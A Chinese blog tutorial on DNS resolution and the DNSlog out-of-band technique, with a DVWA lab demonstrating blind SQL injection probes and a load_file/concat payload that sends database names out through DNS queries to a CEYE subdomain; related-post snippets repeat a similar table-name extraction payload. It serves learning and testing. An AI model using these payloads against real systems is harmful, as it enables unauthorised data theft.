DNSlog

最新推荐文章于 2024-09-18 09:08:15 发布
最新推荐文章于 2024-09-18 09:08:15 发布
阅读量2.9k 收藏 10
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/104536108
版权

相关介绍

DNS

       域名系统(Domain Name System),是互联网使用的命名系统,用来便于人们使用的机器名字转换为IP地址。

DNS解析
解析过程要点:

       当某一个应用进程需要把主机名解析为IP地址时,该应用进程就调用解析程序,并成为DNS的一个客户(DNS Client),把待解析的域名放在DNS请求报文中,以UDP用户数据报方式发给本地域名服务器(使用UDP是为了减少开销)。本地域名服务器在查找域名后,把对应的IP地址放在响应报文中返回。应用进程获得目的主机的IP地址后即可进行通信。若本地域名服务器不能响应该请求,则本地域名服务器就暂时充当DNS的另一个客户,并向其他域名服务器发出查询请求。这种过程直至找到能够响应该请求的域名服务器为止,否则报错。

解析过程:

       主机向本地域名服务器的查询一般都是采用递归查询。所谓的递归查询就是:若本地域名服务器无法响应主机发出的DNS解析查询(没找到),那么本地域名服务器就以DNS客户的身份向根域名服务器发出查询请求的报文(替主机继续查询),而不是让主机自己进行下一步查询。因此,递归查询返回的结果或着是索要查询的IP地址,或着是报错,报错即是查询不到某域名的IP地址。
       本地域名服务器向根域名服务器的查询通常是采用迭代查询(也可以采用递归查询,取决于最初的查询请求报文的设置)。所谓的迭代查询就是:当根域名服务器收到查询请求时,要么返回查询的IP地址,要么告诉本地域名服务器:“你下一步应当向哪一个域名服务器进行查询”。然后让本地域名服务器进行后续查询。根域名服务器通常是把自己知道的顶级域名服务器的IP地址高速本地域名服务器,让本地域名服务器再向顶级域名服务器查询。本地域名服务器就是以这种方式进行迭代查询。
在这里插入图片描述
注:在DNS请求之前,先检查主机的hosts文件是否存在这个域名和IP地址的映射关系。若有直接给出这个IP地址,若没有再向域名服务器发送查询请求。

DNSlog
利用概述

前提条件:

  1. DNS查询会在域名服务器留下日志记录;
  2. 配置自己的域名服务器,可使用免费的平台CEYE;

利用场景
       针对无回显的情况:SQL盲注、SSRF、RCE…
利用原理:
        将DNSlog平台给出的域名带入payload中,构造拼接payload,使其能够触发DNS查询请求,根据DNS解析的规则,查询过程中会发送请求到DNSlog平台的域名服务器,在DNSlog平台的日志记录中查看带入的payload信息的结果。
在这里插入图片描述

实验

工具
DVWA盲注
  1. 1' and 1=1#1' and 1=2#验证存在SQL盲注;
    在这里插入图片描述在这里插入图片描述
  2. 1' order by 2#1' order by 3#验证存在2个字段;
    在这里插入图片描述在这里插入图片描述
  3. 构造payload:1' union select 1,load_file(concat('\\\\',(select database()),'.xxxxx.ceye.io\\sql'))#
    注:xxxxx为CEYE给定子域名;
    这里submit之后需要等待响应,再到CEYE中去
    在这里插入图片描述
    在这里插入图片描述
  4. 其他的查询只需要修改payload中的select database()部分即可。

总结

       此文记录个人学习和使用DNSlog的一些理解,若有理解错误的地方希望大佬们指出😆。

参考

wxlblh
关注
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1851
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
DNSlog平台详解
不忘初心,护天下安全!
09-21 4387
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入,如命令执行、SSRF、XXE、sql盲注、xxs盲打等。在windows和linux因具体shell指令不同,因此需要分情况讨论,但思路一致,通过在dnslog平台的查询中,插入主机指令执行后的结果,将结果数据外带。以靶场 pikachu 的时间盲注为例,输入qianli' and sleep(5)#,耗时5秒。
dnslog:简约的 DNS 日志记录工具
05-31
dns日志 信息 简约的 DNS 日志记录工具。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
好用的dnslog在线平台
最新发布
白帽子黑客SuperherRo
09-18 356
dnslog在线平台分享
DNSlog介绍
热门推荐
告白的博客
07-09 2万+
0x00 DNSlog 介绍 首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件, 0x01 DNSlog回显原理 首先了解一下多级域名的概念,我们知道因特网采用树状结构命名方法,按组织结构划分域是一个名字空间中一个被管理的划分,域可划分为子域,子域再可被划分为多级域名称为一级域名,二级域名,三级域名,从一个域名地址来从右到左依次是顶级域名,二级域名,三级域名,例如 gao
dnslog
shystartree的专栏
04-07 194
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1316
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
dnslog server
09-08
DNSlog Server是一个专门用于DNS日志记录和分析的工具,主要应用于网络安全领域,特别是渗透测试和应急响应。在本文中,我们将深入探讨DNSlog Server的工作原理、用途以及如何利用它来提升网络安全。 **DNSlog ...
通过Dnslog判断是否使用fastjson
XZ_______的博客
04-19 1289
扫码关注公众号获取更多资料
dnsgo:小型,可爱的DNS服务器。 使用它来测试Web安全性,例如dnslogdns重新绑定。 有点像ceye.io
04-29
dnsgo 那是什么? 这是一台dns服务器,您可以在需要使用自己的dns服务器时使用它。 在哪里使用? 将其用作网站的名称服务器(现在仅支持“ A”记录)。 在内部网络中使用它。 如快速的dns缓存服务器。...
DNSlog注入
weixin_30496431的博客
03-29 721
原理: 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了,图示如下。 DNS在解析的时候会留下日志,咱们这个就是读取多...
DNSDNSLog
qq_45675619的博客
05-11 2252
这里写目录标题DNS简介解析过程DNSLog简介ceye的使用DNSLog注入SQL盲注 DNS 简介 DNS(Domain Name System),也就是域名系统。将域名与IP地址相互映射的一个分布式数据库。DNS使用UDP端口53。 域名解析的过程就是将域名去DNS服务器的数据库中寻找,这是比较耗费时间的。为了提高上网速度,运营商一般在他们的DNS服务器中缓存了许多的DNS记录,再根据用户所在地进行网络分配。这样用户打开网页则不需要去查询DNS数据库,而是直接使用缓存的DNS记录。 解析过程 大致流程
dnslog相关知识
m0_55772907的博客
05-03 1835
一、原理 我注册了一个为 a.com 的域名,我将他 a 记录泛解析到 10.0.0.0 上,这样就实现了无论我记录值填什么他都有解析,并且都指向 10.0.0.0,当我向 dns 服务器发起 test.a.com 的解析请求时,DNSlog 中会记录下他给 test.a.com 解析,解析值为 10.0.0.0(通俗来讲就是我们申请一个 dnslog 的平台,当我们盲注的时候把想要的数据和平台给的地址拼接起来,dnslog 平台就会把请求的记录显示出来)。 二、 DNS相关知识 域名系统(Dom
DNSlog平台的搭建
m0_51468027的博客
07-12 6108
从0到1搭建DNSlog平台,最后拓展了实现自动化运行DNSlog平台
dnslog 记录
K0reyoshi的博客
04-18 1317
http://127.0.0.1/inject.php?user=1'+and+if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='lol' limit 0,1),'.d63d7k.ceye.io\\ab'))),1,1)--+- http:...
DNSLog使用方法
weixin_37104668的博客
09-14 1万+
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 DNSLOG工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 6443
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
linux dnslog
08-10
Linux DNSlog 是一个 DNS记录查询平台,用于记录DNS解析请求和返回的记录。可以通过在Linux系统上配置相应的DNS服务器,将域名解析请求发送到DNSlog平台进行记录。当用户在Linux系统上进行DNS请求时,DNSlog平台会将请求的记录显示出来。这样可以方便用户对DNS解析进行监测和分析。123 #### 引用[.reference_title] - *1* *2* *3* [DNSlog平台各种利用姿势(盲注)](https://blog.csdn.net/weixin_30588427/article/details/114493929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值